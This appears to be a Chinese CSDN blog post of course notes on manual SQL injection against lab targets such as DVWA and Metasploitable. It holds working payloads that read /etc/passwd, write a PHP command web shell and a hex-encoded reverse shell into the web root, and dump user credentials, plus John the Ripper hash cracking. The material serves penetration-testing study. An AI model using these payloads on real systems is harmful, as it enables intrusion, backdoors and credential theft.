【安全牛学习笔记】手动漏洞挖掘-SQL注入

本文详述了手动进行SQL注入漏洞挖掘的过程,包括读取、写入文件,利用MySQL进行权限提升,并展示了如何利用PHP后门创建反弹shell。同时,文章提及Security+认证在信息安全领域的价值和火爆原因。
摘要由CSDN通过智能技术生成

​root@kali:~# john --format=raw-MD5 dvwa.txt

root@kali:~# cd .john/

root@kali:~/.john# ls

john.log  john.pot

root@kali:~/.john# cat john.log

root@kali:~/.john# cat john.pot

root@kali:~/.john# rm *       //删除破解日志,才能进行下面的工作

root@kali:~/.john# john --format=raw-MD5 dvwa.txt

手动漏洞挖掘-----SQL注入

读取文件

    'union SELECT null,load_file('/etc/passwd')--+

写入文件

    'union select null,"<?php passthru($_GET['cmd']);?>" INTO DUMPFILE "/var/www/a.php"--+

    Mysql账号

    cat php-revers-shell.php | xxd -ps | tr -d '\n'

    'union select null, (0x3c3f706870) INTO DUMPFILE '/tmp/x.php'--

保存下载数据库

    'union select ull,concat(user,0x3a,password) from users INTO OUTFILE '/tmp/a.db'--

root@kali:~# ssh msfadmin@192.168.1.103

msfadmin@metasploitbale:~$ cd /var/

msfadmin@metasploitbale:/var$ cd www/

msfadmin@metasploitbale:/var/www$ ls

1.php  dvwa       mutillidea   phpMyAdmin  tikiwiki    twiki

dva    index.php  phpinfo.php  test        tikiwiki-old

msfadmin@metasploitbale:/var/www/$ cd dvwa/

msfadmin@metasploitbale:/var/www/dvwa$ ls

about.php      dvwa         index.php         php.ini

GHANGELOG.txt  external     instructions.php  README.txt

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值